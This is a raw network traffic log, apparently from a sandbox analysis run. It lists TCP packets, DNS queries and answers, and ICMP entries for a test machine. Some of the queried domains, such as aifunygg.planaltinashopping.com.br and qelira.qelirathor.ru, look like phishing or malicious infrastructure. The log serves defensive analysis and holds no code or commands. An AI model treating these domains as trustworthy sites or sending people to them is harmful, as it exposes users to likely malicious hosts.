                                                                                  Jan 15, 2025 03:00:49.599106073 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.653920889 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.699136972 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709503889 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709513903 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709546089 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709599972 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709614038 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.709628105 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709639072 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.709688902 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.709728956 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.788034916 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.788064957 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.788184881 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.788199902 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.789264917 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.795089960 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.795105934 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.795181990 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.795188904 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.796021938 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.873910904 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.873944044 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.874094963 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.874114037 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.874593973 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.878479958 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.878510952 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.878593922 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.878611088 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.879427910 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.882819891 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.882900953 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.882919073 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.882997036 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.883059025 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.883241892 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.883261919 CET44356747151.101.194.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.883275032 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.883302927 CET56747443192.168.2.4151.101.194.137
                                                                                  Jan 15, 2025 03:00:49.898221970 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:49.898252964 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.898330927 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:49.905095100 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:49.905111074 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.955780029 CET56746443192.168.2.4188.114.96.3
                                                                                  Jan 15, 2025 03:00:49.999371052 CET44356746188.114.96.3192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.376952887 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.384567976 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.384599924 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.385838985 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.385953903 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.386315107 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.386374950 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.386565924 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.386574984 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.432941914 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.485796928 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.487134933 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.487166882 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.487337112 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.487370014 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.487420082 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.487449884 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.493917942 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.493984938 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.493993044 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.494071960 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.494100094 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.494118929 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.494127035 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.494164944 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.494170904 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.505330086 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.505410910 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.505428076 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.543067932 CET44356746188.114.96.3192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.543293953 CET44356746188.114.96.3192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.543382883 CET56746443192.168.2.4188.114.96.3
                                                                                  Jan 15, 2025 03:00:50.551862001 CET56746443192.168.2.4188.114.96.3
                                                                                  Jan 15, 2025 03:00:50.551903963 CET44356746188.114.96.3192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.557702065 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:50.557754040 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.557811022 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:50.558052063 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:50.558068991 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.564513922 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.577920914 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.577986956 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578078032 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578087091 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.578098059 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578142881 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.578155994 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578288078 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578325033 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578332901 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.578341961 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578378916 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578388929 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.578398943 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.578438044 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.579037905 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.579132080 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.579170942 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.579185009 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584506989 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584547043 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584563017 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.584579945 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584634066 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.584640980 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584952116 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584990025 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.584991932 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.585001945 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.585050106 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.585402012 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.585504055 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.585536003 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.585539103 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.585550070 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.585589886 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.639189005 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668276072 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668328047 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668339014 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.668350935 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668380976 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668399096 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.668406010 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668440104 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.668446064 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668670893 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668706894 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668709040 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.668719053 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.668764114 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.670741081 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.670756102 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.670795918 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.670813084 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.670830965 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.670871973 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.670887947 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.675205946 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.675270081 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.675301075 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.675326109 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.675343990 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.675368071 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.675401926 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.675924063 CET56748443192.168.2.4151.101.130.137
                                                                                  Jan 15, 2025 03:00:50.675940990 CET44356748151.101.130.137192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.029026031 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.029320955 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.029355049 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.030419111 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.030476093 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.031593084 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.031660080 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.031740904 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.075337887 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.085555077 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.085586071 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.132457972 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.155713081 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.155910969 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.156034946 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.156600952 CET56751443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.156620026 CET4435675135.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.157336950 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.157388926 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.157491922 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.157752037 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.157771111 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.631292105 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.631578922 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.631592989 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.631989002 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.632304907 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.632373095 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.632427931 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.679332018 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.764528036 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.764611006 CET4435675235.190.80.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:51.764709949 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.765465975 CET56752443192.168.2.435.190.80.1
                                                                                  Jan 15, 2025 03:00:51.765486956 CET4435675235.190.80.1192.168.2.4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 15, 2025 02:58:13.096251965 CET138138192.168.2.4192.168.2.255
                                                                                  Jan 15, 2025 02:58:13.435812950 CET5578553192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:26.947017908 CET5253653192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:26.947419882 CET6348553192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:26.965013981 CET53647921.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:26.995579004 CET53506621.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:27.363221884 CET53525361.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:27.652124882 CET53634851.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:27.995524883 CET53635531.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:28.669668913 CET5616553192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:28.669805050 CET6441553192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:28.676318884 CET53561651.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:28.676424026 CET53644151.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:28.855952024 CET6487253192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:28.856089115 CET4969853192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:28.964953899 CET53496981.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:29.675600052 CET53648721.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:29.999423027 CET6138253192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:30.000907898 CET5111553192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:30.006665945 CET53613821.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:30.008397102 CET53511151.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:30.014575005 CET6537153192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:30.014704943 CET6023353192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:30.021742105 CET53653711.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:30.021872997 CET53602331.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:31.227592945 CET6043953192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:31.228161097 CET5032153192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 02:58:31.234189987 CET53604391.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:31.234673977 CET53503211.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:39.078350067 CET53552201.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:58:45.141191006 CET53637321.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:59:03.891078949 CET53554361.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:59:08.951345921 CET53572291.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 02:59:26.469862938 CET53542831.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:06.701565027 CET53499621.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:36.067895889 CET5823353192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:36.068068027 CET6042253192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:36.074371099 CET53582331.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:36.075221062 CET53604221.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:37.575645924 CET5534853192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:37.576124907 CET5952353192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:37.582624912 CET53553481.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:37.582807064 CET53595231.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:47.310286045 CET5837653192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:47.310467958 CET6066853192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:47.400538921 CET53583761.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:47.502156019 CET53606681.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.085278034 CET6145353192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:49.093878031 CET53614531.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.095165968 CET5803853192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:49.103564024 CET53580381.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.888595104 CET5086953192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:49.888772011 CET5422953192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:49.896533966 CET53508691.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.897507906 CET53542291.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:49.962266922 CET53558571.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.549957037 CET5405353192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:50.550416946 CET6465953192.168.2.41.1.1.1
                                                                                  Jan 15, 2025 03:00:50.556967974 CET53540531.1.1.1192.168.2.4
                                                                                  Jan 15, 2025 03:00:50.557323933 CET53646591.1.1.1192.168.2.4
                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                  Jan 15, 2025 02:58:27.652224064 CET192.168.2.41.1.1.1c24a(Port unreachable)Destination Unreachable
                                                                                  Jan 15, 2025 03:00:47.502418995 CET192.168.2.41.1.1.1c27e(Port unreachable)Destination Unreachable
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 15, 2025 02:58:13.435812950 CET192.168.2.41.1.1.10x41f5Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:26.947017908 CET192.168.2.41.1.1.10x8854Standard query (0)aifunygg.planaltinashopping.com.brA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:26.947419882 CET192.168.2.41.1.1.10x4c9dStandard query (0)aifunygg.planaltinashopping.com.br65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.669668913 CET192.168.2.41.1.1.10x5bafStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.669805050 CET192.168.2.41.1.1.10x9bf7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.855952024 CET192.168.2.41.1.1.10x364aStandard query (0)aifunygg.planaltinashopping.com.brA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.856089115 CET192.168.2.41.1.1.10x9567Standard query (0)aifunygg.planaltinashopping.com.br65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:29.999423027 CET192.168.2.41.1.1.10xe8f4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.000907898 CET192.168.2.41.1.1.10xbaeeStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.014575005 CET192.168.2.41.1.1.10x7a18Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.014704943 CET192.168.2.41.1.1.10x99d7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:31.227592945 CET192.168.2.41.1.1.10xbff2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:31.228161097 CET192.168.2.41.1.1.10x38b0Standard query (0)www.google.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:36.067895889 CET192.168.2.41.1.1.10x57bdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:36.068068027 CET192.168.2.41.1.1.10xd297Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:37.575645924 CET192.168.2.41.1.1.10x90d3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:37.576124907 CET192.168.2.41.1.1.10x9d92Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:47.310286045 CET192.168.2.41.1.1.10xbaabStandard query (0)qelira.qelirathor.ruA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:47.310467958 CET192.168.2.41.1.1.10x492eStandard query (0)qelira.qelirathor.ru65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.085278034 CET192.168.2.41.1.1.10x7977Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.095165968 CET192.168.2.41.1.1.10x6785Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.888595104 CET192.168.2.41.1.1.10xcec1Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:49.888772011 CET192.168.2.41.1.1.10x34f2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:50.549957037 CET192.168.2.41.1.1.10x7bb4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 03:00:50.550416946 CET192.168.2.41.1.1.10xda27Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 15, 2025 02:58:13.617654085 CET1.1.1.1192.168.2.40x41f5No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:13.941030025 CET1.1.1.1192.168.2.40xe2a1No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:13.941030025 CET1.1.1.1192.168.2.40xe2a1No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:27.363221884 CET1.1.1.1192.168.2.40x8854No error (0)aifunygg.planaltinashopping.com.br108.179.252.84A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.676318884 CET1.1.1.1192.168.2.40x5bafNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.676318884 CET1.1.1.1192.168.2.40x5bafNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:28.676424026 CET1.1.1.1192.168.2.40x9bf7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:29.675600052 CET1.1.1.1192.168.2.40x364aNo error (0)aifunygg.planaltinashopping.com.br108.179.252.84A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.006665945 CET1.1.1.1192.168.2.40xe8f4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.006665945 CET1.1.1.1192.168.2.40xe8f4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.008397102 CET1.1.1.1192.168.2.40xbaeeNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.021742105 CET1.1.1.1192.168.2.40x7a18No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.021742105 CET1.1.1.1192.168.2.40x7a18No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:30.021872997 CET1.1.1.1192.168.2.40x99d7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:31.234189987 CET1.1.1.1192.168.2.40xbff2No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 02:58:31.234673977 CET1.1.1.1192.168.2.40x38b0No error (0)www.google.com65IN (0x0001)false
